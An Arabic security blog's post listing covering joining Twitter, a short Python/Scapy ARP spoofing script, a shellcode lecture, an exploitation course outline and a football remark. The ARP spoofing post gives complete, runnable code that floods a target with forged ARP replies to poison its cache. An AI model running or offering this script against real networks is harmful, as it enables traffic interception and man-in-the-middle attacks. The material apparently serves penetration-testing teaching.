خطوة للأمام أم للخلف (إستعمال Twitter)؟!

twitter-logo-cute-bird

منذ فترة طويلة من الزمن وأفكر بإستعمال خدمة Twitter بالذات … وذلك بسبب كون العديد من الأخوة والأصدقاء دائماً يسألونني عنها، وعن سهولة المتابعة من خلالها … ولهذا صراحة قمت بعمل حساب عليه … أضطررت الى عمل حساب بإسم binaryz0ne وذلك لأنه يبدو هناك من سبقني للأسماء الأخرى … على كل حال اتمنى أن أستطيع أن أتواصل مع الجميع من خلال هذه الخدمة، وكذلك أن تكون خطوة جيدة نحو الأمام وليس خطوة سيئة تعيدني الى الخلف … سأحتاج الى بعض الوقت للتعود والتأقلم عليه وكذلك للتعرف على كيفية إستعماله …

شكراً للجميع …

Posted in Life, z0ne | Tagged , , | 8 Comments

سكربت بسيط لعمل ARP Spoofing

سكربت بسيط لعمل ARP Spoofing … قم بنسخ الكود وتشغيله او تحميله من صفحة المشاريع (هنا) …

#!/usr/bin/env python
import sys, time
from scapy.all import sendp, ARP, Ether

if len (sys.argv) < 4:
	print "Usage\n:"
	print sys.argv[0] + "   "
	print "./arpSpoofer.py eth0 192.168.1.56 192.168.1.100"	
	sys.exit (1)

networkInterface = str(sys.argv[1])
targetIPAddr = sys.argv[2]
spoofedIPAddr = sys.argv[3]

# Assembling the Spoofed Packet
spoofedPacket = Ether() / ARP(pdst=targetIPAddr, psrc=spoofedIPAddr, op="is-at")

# Start Spoofing (aka Poisoning) :)
while True:
	sendp(spoofedPacket, iface=networkInterface)
	time.sleep (1)

المزيد من التجارب في الطريق إن شاء الله :)

Posted in Development, PenTest, Software/Tools | Tagged , , , , , , , | Comments Off on سكربت بسيط لعمل ARP Spoofing

مقدمة عن الـ Shellcodes لمحاضرة HTID

كما قلت في أحد ردودي في مجتمع لينُكس العربي بإني سأقوم بإعداد محاضرة بسيطة عن الـ Shellcodes وذلك لأني وجدت الكثير من طلابي لا يعرفون كثيراً عنها، ولا ما هي أنواعها ومتى نستعمل كل واحدة منها … ولذلك قمت بإعداد هذه المادة البسيطة جداً، لا يوجد فيها كتابة Shellcode ولكن توضيح لمعناهم وماذا نعني عندما نسمع كلمة Opcode … في نهاية المحاضرة هناك توضيح لأهم الأمور التي يجب أن نأخذها بعين الإعتبار حين نقوم بإستعمال أو عمل Shellcode … أيضاً وضعت Template يسهل عليك عملية تحليل أي Shellcode قمت بتحميله من الأنترنت … يعني يسهل عليك عملية الـ Debugging له وذلك لمعرفة مالذي يقوم به … هناك كذلك بعض الأدوات التي أراها مفيدة للغاية وبدون شك مصادر لمواقع رائعة ومفيدة للغاية وبدون شك بدون الإستغناء عن بعض الكتب التي يجب ان تكون بحوزتك :)

تجدون ذلك في الصفحة الخاصة بالمحاضرات هذه … هنا

خارج النص: فكرت قبل فترة بالتسجيل لإمتحان OSCE وذلك لكي أجبر نفسي على العمل والدراسة أكثر وكذلك بعد نهاية العمل نحصل على شهادة … تجاوزت كل شروط وإمتحانات القبول ولكن أنصدمت إنه لا يحق لي الإشتراك في الإمتحان مباشرة وإنما يجب ان أقوم بشراء الدورة CTP بالبداية … شيء محبط صراحة، ومبلغ الدورة ليس بالبسيط ولماذا أشتري شيء لست بحاجة له !!! على كل حال سوف أحاول أن أخوضها في القريب العاجل …

على كل حال أتمنى تعجبكم محاضرة الـ Shellcode … والتي كانت جزء من محاضرة الـ Exploitation Demo …

Posted in Academia, Exploitation, PenTest, Publications, Vulnerability | Tagged , , , , , , , , , | Comments Off on مقدمة عن الـ Shellcodes لمحاضرة HTID

الجزء الخامس (1) من محاضرات HTID

في البداية أود أن أشكر أخي العزيز شادي على مساعدتي في عمل هذه المادة بالتحديد … صراحة لم يكن لتخرج المادة بهذا الشكل لولا فضل الله ومن ثم شادي … ألف شكر شادي، وإن شاء الله بميزان حسناتك …

الجزء الخامس معني بالـ Software Exploitation سواءاً لينُكس أو ويندوز … بصراحة قمت بتقسيمه الى التالي:
(1) يتحدث عن مقدمة الى الـ Software Exploitation وماذا نعني بها ولماذا نحتاحها … كذلك الحديث عن المعالجات، المسجلات، لغة أسمبلي، والمكدس Stack وغيرها من الأمور الجد ظرورية لمعرفتها …
Introduction to CPU, Registers, Memeory Management, Assembly, and other stuff

(2) مقدمة سريعة عن المنقحات Debuggers … وتم توضيح فكرتهم من خلال برنامج بسيط وبإستعمال GDB …
(3) هنا نبدأ الحديث عن التلاعب بالذاكرة والتخريب عليها أو بعبارة أخرى Memory Corruption … في هذا الجزء نبدأ عملية Exploitation … سيتم إستعمال Immunity Debugger هنا … وكذلك سيتم عمل Demo كيفية تحويل الـ Exploit التي تم عملها الى Metasploit بواسطة mona.py …
(4) الطرق المتقدمة في التصدي مثل: ASLR, DEP, SafeSEH, NX, Canaries or Cookies or Stack Gaurd وكذلك كيف يمكن تجاوز هذه الحمايات … حيث سنتعرف على Ret2libc, Heap, ROP وغيرها … هذا الجزء متقدم للغاية، ولهذا يجب فهم ما سبق للوصول الى هنا …

تم رفع الجزء الأول والثاني، سيتم رفع البقية في القريب العاجل … المحاضرات تجدونها هنا

بالتوفيق للجميع …


Posted in Academia, Exploitation, PenTest, Publications, Vulnerability | Tagged , , , , , , , , , , , , , , , , , , , , , , | 4 Comments

ومن غيره يجرؤ على الوفاء بهكذا وعد؟

لمن لا يعرف القصة … مدرب ريال مدريد الإسباني قال في مؤتمره الأخير قبل مباراة الديربي مع الجار بإنه من يريد أن يأتي للملعب ليشتمه أو يصفر ضده … فإنه سوف يدخل الى أرض الملعب قبل المباراة وللجماهير حق أن تفعل ذلك … ولكن حين تبدأ المباراة أريد من الجميع أن يكون مسانداً للفريق !!! يعني الرجل ذهب بنفسه الى محكمة علنية والمحكوم هو نفسه وأمام العلن !!! لا يعملها صراحة إلا الأوفياء !!!
Continue reading

Posted in Sport | Tagged , , , , , , , | Comments Off on ومن غيره يجرؤ على الوفاء بهكذا وعد؟